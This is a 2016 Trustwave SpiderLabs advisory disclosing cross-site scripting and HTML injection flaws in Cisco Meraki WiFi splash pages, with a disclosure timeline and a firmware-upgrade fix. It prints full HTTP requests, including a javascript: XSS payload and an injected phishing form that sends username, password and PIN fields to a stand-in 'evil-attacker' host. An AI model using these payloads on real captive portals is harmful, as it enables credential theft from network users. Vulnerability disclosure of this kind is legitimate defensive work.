锘縏rustwave SpiderLabs Security Advisory TWSL2016-001: Multiple Vulnerabilities in Cisco Meraki Published: 01/12/2016 Version: 1.0 Vendor: Cisco (https://meraki.cisco.com/) Product: Cisco Meraki Product description: Cisco Meraki is a complete cloud managed networking solution. Cisco Meraki is the leader in cloud controlled WiFi, routing, switching and security. Secure and scalable, Cisco Meraki enterprise networks simply work. Finding 1: Cross Site Scripting Credit: Kyprianos Vasilopoulos of Trustwave A cross-site scripting vulnerability is present in the Cisco Meraki portal splash page. When users access a Wifi network they will be redirected to a custom webpage before accessing the internet. By entering the payload <style>li {list-style-image: url("javascript:alert('XSS')");}</style> on the splash page it is possible to trigger a cross site scripting vulnerability within the visiting user's browser. In order to enter the payload you need to login to the portal The vulnerability has been confirmed on IE 6 and 7. Example: Enter the payload POST /tw_test_net-1-2/n/I9xFFbBc/splash/preview/0/efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8/ HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://xxx.xxx.xxx.xxx/tw_test_net-1-2/n/I9xFFbBc/manage/configure/splash_page Cookie: p_splash_session=MMX84Ps986LNxqVsTJhsTegzOVSw_n_1FK; _session_id_for_n155=a8cf170f0016fc4a44b54f767b5cb6e7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 2511 X-dotNet-Beautifier: 230; DO-NOT-REMOVE authenticity_token=token&ssid[wired_vlan_id]=64&ssid[splash2_theme_identifier]=efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8&ssid[admin_splash_url]=&ssid_splash_detail[extra_text]=<style>li {list-style-image: url("javascript:alert('XSS')");}</style> <ul><li>XSS</li></ul></a> </h1> </h1>&ssid_splash_detail[logo_md5]=&ssid_splash_detail[logo_extension]=&ssid[language_code]=en&ssid[splash_timeout]=86400&ssid[overwrite_continue_url_enabled]=false&ssid[overwrite_continue_url]=&settings_change_hash={"ssid_splash_detail[extra_text]":{"label":"Message","new_text":<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br></a>","old_text":"XSS"}}&ssid[number]=0&ssid[splash_type]=splash2&splash_themes[c12b0d115a00d3a88f7c39eefd60257529afaf7f][marked_for_deletion]=false&splash_themes[6961b3f08ec7dcb6eaa3fb0814e4722e4a83b6b8][marked_for_deletion]=false&splash_themes[efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8][marked_for_deletion]=false&ssid_splash_detail[color_overrides]=f7f7f7,676767,1682B9,ffffff,5e5e5e,ffffff,f7f7f7,66bc29,5f800a User access GET /splash/?mac=xx:xx:xx:xx:xx:xx&client_ip=xx.xx.xx.xx&client_mac=xx:xx:xx:xx:xx:xx&vap=0&vlan=64&a=cfbd5dcb7468a01c771cbf349fb3ae6424cd716e&b=3710473&auth_version=5&key=debc54xx:xx:xx:xx:xx:xx&acl_ver=P3188611V2&blocked_server=xx.xx.xx.xx&continue_url=http://google.com/ HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 03 Nov 2015 21:31:29 GMT; length=7122 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: n155.network-auth.com Connection: Keep-Alive Cookie: p_splash_session=MMvddhIIAXhRLBn3uQ6l-r2bzht8p37aIwKiWgMZL-BfKSbIu-M2n_0R6i2B8F4zsC21yFBksGnMqxBFoW2j__VmVtt27hrr7jCG2db8KIcgAGZvmg6PAeU6fl1Z0Q7obiREXMUV-mIlrUXkMF36Jr_mGD8G6fjFNZaUd8lzMHru1fdDUyXPVVH7ffP-04T7gtX_mWgAJXnn8WonMeNKzCUxsJRAQFUGVfyiaCO9r7kIt5bh7a595JIy_0p4mTb9GeUsk6S5FPmq33XGAu-kKysiPuHIQ1vLomIYllQ5WrWB_aCYcdUtvPGK8ZMWQ_ziDk65Y0S4KUeJnUzRLzwEpTRtDdRFkptyJIs9DBE5W2TsU4oljQt-z9LONLoZgqEHdTy53CYfUPSa-Ld09oWSGhGZrvw9S3H8LJ3VFVGw5iWY92eJm_qSVMCJFOu3qno0ZlgTvKwFzqSNRaUfvh5_87TiaQOGE-GStVVDtV2SXayfNjxFbmXqal-29gPLKOUlht4rDUxtV-NMj-wSkaji0AFXa86YLnkZCQgMUXrepm28Sp8Iec90u2OIHt5GyNnEu2QisYgnr2kE4 Finding 2: HTML Injection Credit: Kyprianos Vasilopoulos of Trustwave You can inject custom HTML code inside the splash message box. This could also be used as part of a phishing or social engineering attack. Example: POST /tw_test_net-1-2/n/I9xFFbBc/splash/preview/0/efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8/ HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://xxx.xxx.xxx.xxx/tw_test_net-1-2/n/I9xFFbBc/manage/configure/splash_page Cookie: p_splash_session=MMX84Ps986LNxqVsTJhsTegzOVSw_n_1FK; _session_id_for_n155=a8cf170f0016fc4a44b54f767b5cb6e7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 2511 X-dotNet-Beautifier: 230; DO-NOT-REMOVE authenticity_token=token&ssid[wired_vlan_id]=64&ssid[splash2_theme_identifier]=efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8&ssid[admin_splash_url]=&ssid_splash_detail[extra_text]=<h1>Trustwave Spiderlabs<h1> <a><center><form action="http://www.evil-attacker/lala.php" method="post"> <br>Username<input type="tex" name="cc"><br>Password<input type="text" name="pin"><br>Pin<input type="text" name="cvv2"><br><input type="submit"> </form></center> <br><img src="https://xxx.xxx.xxx.xxx/SpiderLabs_-_Bug.jpg"><style>li {list-style-image: url("javascript:alert('XSS')");}</style> <ul><li>XSS</li></ul></a> </h1> </h1>&ssid_splash_detail[logo_md5]=&ssid_splash_detail[logo_extension]=&ssid[language_code]=en&ssid[splash_timeout]=86400&ssid[overwrite_continue_url_enabled]=false&ssid[overwrite_continue_url]=&settings_change_hash={"ssid_splash_detail[extra_text]":{"label":"Message","new_text":"<h1>Trustwave Spiderlabs<h1> </p><a img src=\"https://xxx.xxx.xxx.xxx/trustwave-spiderlabs.jpg\"<br><center><form action=http://www.evil-attacker/lala.php method=post><br>Username<input type=tex name=cc><br>Password<input type=text name=pin><br>Pin<input type=text name=cvv2><br><input type=submit></center><br><img src=\"https://xxx.xxx.xxx.xxx/SpiderLabs_-_Bug.jpg\">\n<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br></a>","old_text":"XSS"}}&ssid[number]=0&ssid[splash_type]=splash2&splash_themes[c12b0d115a00d3a88f7c39eefd60257529afaf7f][marked_for_deletion]=false&splash_themes[6961b3f08ec7dcb6eaa3fb0814e4722e4a83b6b8][marked_for_deletion]=false&splash_themes[efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8][marked_for_deletion]=false&ssid_splash_detail[color_overrides]=f7f7f7,676767,1682B9,ffffff,5e5e5e,ffffff,f7f7f7,66bc29,5f800a Remediation Steps: Upgrade to the latest device firmware. Revision History: 10/27/2015 - Vulnerability disclosed to vendor 12/07/2015 - Patch released by vendor 12/08/2015 - Requested additional information about firmware 12/17/2015 - Sent follow-up email regarding no response 12/30/2015 - Sent follow-up email regarding no response 01/12/2016 - Sent follow-up email regarding no response 01/13/2016 - Advisory published References 1. https://documentation.meraki.com/zGeneral_Administration/Firmware_Upgrades/Cisco_Meraki_Firmware_FAQ#How_do_I_get_the_latest_firmware_earlier.3F About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.